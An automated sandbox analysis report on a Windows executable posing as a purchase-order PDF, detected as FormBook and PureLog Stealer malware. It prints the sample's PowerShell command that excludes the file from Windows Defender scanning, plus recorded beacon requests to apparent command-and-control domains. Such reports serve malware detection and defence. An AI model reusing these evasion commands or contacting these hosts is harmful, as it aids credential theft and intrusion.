Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO 2025918 pdf.exe

Overview

General Information

Sample name:PO 2025918 pdf.exe
Analysis ID:1590629
MD5:625d2fae7b900a58c7e9daed1f85cab3
SHA1:6c61eb8e5851778e4ed57044c50442dae2b875bd
SHA256:d1a82af2d052117e637c17671568650659a93541083f107e4d1b2d357935928d
Tags:exeuser-TeamDreier
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO 2025918 pdf.exe (PID: 6468 cmdline: "C:\Users\user\Desktop\PO 2025918 pdf.exe" MD5: 625D2FAE7B900A58C7E9DAED1F85CAB3)
    • powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO 2025918 pdf.exe (PID: 5560 cmdline: "C:\Users\user\Desktop\PO 2025918 pdf.exe" MD5: 625D2FAE7B900A58C7E9DAED1F85CAB3)
      • mIrIhAjAJblou.exe (PID: 3200 cmdline: "C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7060 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • mIrIhAjAJblou.exe (PID: 2520 cmdline: "C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6468 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2220434300.0000000005C10000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.2211278593.00000000043B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO 2025918 pdf.exe.43d7590.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.PO 2025918 pdf.exe.43d7590.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                5.2.PO 2025918 pdf.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  0.2.PO 2025918 pdf.exe.5c10000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.PO 2025918 pdf.exe.5c10000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 2025918 pdf.exe", ParentImage: C:\Users\user\Desktop\PO 2025918 pdf.exe, ParentProcessId: 6468, ParentProcessName: PO 2025918 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", ProcessId: 1276, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 2025918 pdf.exe", ParentImage: C:\Users\user\Desktop\PO 2025918 pdf.exe, ParentProcessId: 6468, ParentProcessName: PO 2025918 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", ProcessId: 1276, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 2025918 pdf.exe", ParentImage: C:\Users\user\Desktop\PO 2025918 pdf.exe, ParentProcessId: 6468, ParentProcessName: PO 2025918 pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 2025918 pdf.exe", ProcessId: 1276, ProcessName: powershell.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: PO 2025918 pdf.exeVirustotal: Detection: 33%Perma Link
                      Source: PO 2025918 pdf.exeReversingLabs: Detection: 34%
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.PO 2025918 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.3895858991.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2458301870.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3898145012.0000000005750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895986128.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3895628866.0000000002820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2453984968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3896619038.0000000005FA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2460325125.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: PO 2025918 pdf.exeJoe Sandbox ML: detected
                      Source: PO 2025918 pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO 2025918 pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: eBJB.pdb source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdb source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mIrIhAjAJblou.exe, 00000007.00000000.2373430247.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp, mIrIhAjAJblou.exe, 0000000A.00000002.3895631434.00000000005CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO 2025918 pdf.exe, PO 2025918 pdf.exe, 00000005.00000002.2459063328.0000000001660000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000008.00000002.3897438142.00000000031AE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2454905808.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000003.2460094659.0000000002E5F000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000008.00000002.3897438142.0000000003010000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: eBJB.pdbSHA256 source: PO 2025918 pdf.exe
                      Source: Binary string: route.pdbGCTL source: PO 2025918 pdf.exe, 00000005.00000002.2457499924.0000000001208000.00000004.00000020.00020000.00000000.sdmp, mIrIhAjAJblou.exe, 00000007.00000002.3896147250.0000000001188000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0283C600 FindFirstFileW,FindNextFileW,FindClose,8_2_0283C600
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 4x nop then jmp 07C21891h0_2_07C21C9B
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax8_2_02829E10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then pop edi8_2_0282E21E
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h8_2_02F204CE

                      Networking

                      barindex
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.letsbookcruise.xyz
                      Source: global trafficTCP traffic: 192.168.2.5:49286 -> 162.159.36.2:53
                      Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /tqv2/?Gxq=1VbhX6&t0A=mw5EMDe107YJTqugc68gmErc1Hs+Bqgx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zyzkbcjQAczVPINQnyJ55BFcYg7GslxzSN34k4b/zmS+IfA== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zucchini.proUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /54nj/?t0A=jQd8/d8A1xfb/FB7GpkT6bk0jTG6GinOCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JjsIyEnVbQOGzSnW49Az79/F0I7s7DjUUiEBnQG3SAllRdw==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vh5g.sbsUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /gq43/?t0A=h/dnkFjaM/BlMTbeYCbPPPvCOUuyeqTz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOG85h61EUnTrHdBHCQyPsxSiY4d4RTFSWTaZW3nKuaFCelg==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.actionhub.liveUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /ktot/?Gxq=1VbhX6&t0A=QtQc2mqNJwvMGBSonF19Oj93OccDibq2plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4cm5qqwpB+o9+wjMZc6zOEOHj6XVSyoPWAhOlCHSGIpA7arg== HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.100millionjobs.africaUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /3541/?t0A=hUAT8pha3r4H+t9+S3MxJs6WhIsd+DYEOZth0k9fm5KLJvCulAvDEPbOc8wYZ2nfufyvJ6Jk1FtS1iVn+RgDiEmRDBrl1krw2W73iPr4/Jg/5IC96P6rf6fefVYTNIm+pw==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.x3kwqc5tye4vl90y.topUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /bqha/?t0A=XaQS++1s5Z2sQk6jmp6aqlAdT5jjUiNTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE4a8JCTBXzC8s0SdcTgnAYDNlXd2JyzVPT3Fze3sMGaFiAg==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /m320/?t0A=Ph0JwVcw7zzuTeHg00MwOUpuuzX2vc4K5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsllCIycJgVOFGc42mqBi0wPhTxFehoqUxxUf8xIGnP1n2EQ==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.truckgoway.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /he9k/?t0A=0MI6+xzwqxZaqD2cO/aG/zu1oIMhaBkQNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOxoEk511kfBxpEvGLE/kVuVEOyttA6Fi+saUHPe6X4Jt0hg==&Gxq=1VbhX6 HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aloezhealthcare.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.zucchini.pro
                      Source: global trafficDNS traffic detected: DNS query: www.vh5g.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.v89ey584d.shop
                      Source: global trafficDNS traffic detected: DNS query: www.actionhub.live
                      Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                      Source: global trafficDNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
                      Source: global trafficDNS traffic detected: DNS query: www.hwak.live
                      Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
                      Source: global trafficDNS traffic detected: DNS query: www.truckgoway.info
                      Source: global trafficDNS traffic detected: DNS query: www.aloezhealthcare.info
                      Source: global trafficDNS traffic detected: DNS query: www.letsbookcruise.xyz
                      Source: unknownHTTP traffic detected: POST /54nj/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeCache-Control: max-age=0Host: www.vh5g.sbsOrigin: http://www.vh5g.sbsReferer: http://www.vh5g.sbs/54nj/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4Data Raw: 74 30 41 3d 75 53 31 63 38 74 55 50 34 30 66 75 35 54 39 79 64 36 70 42 7a 62 42 6f 67 45 79 59 54 51 32 63 4b 68 79 69 6e 35 67 75 5a 4a 56 7a 36 68 46 34 48 41 76 37 4c 76 34 74 32 4e 74 63 64 64 4a 31 73 41 2b 39 69 59 42 6c 44 76 50 68 6e 4f 64 56 4c 73 39 38 76 73 49 74 42 33 5a 66 5a 2f 6d 45 41 6d 57 6c 2f 67 6a 58 6c 72 64 6d 64 38 6b 36 4b 78 30 66 6f 32 38 79 45 57 72 6f 43 30 6f 69 43 65 63 44 74 48 44 6e 73 31 38 77 34 55 51 71 41 2f 42 62 65 56 52 49 61 32 43 77 78 68 55 55 4e 74 4e 70 33 54 63 6d 46 44 72 4c 73 67 4f 2b 4c 53 6a 2f 37 72 38 38 51 47 5a 42 39 55 47 61 57 6d 55 54 37 51 55 3d Data Ascii: t0A=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNtNp3TcmFDrLsgO+LSj/7r88QGZB9UGaWmUT7QU=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:19 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 11:02:22 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 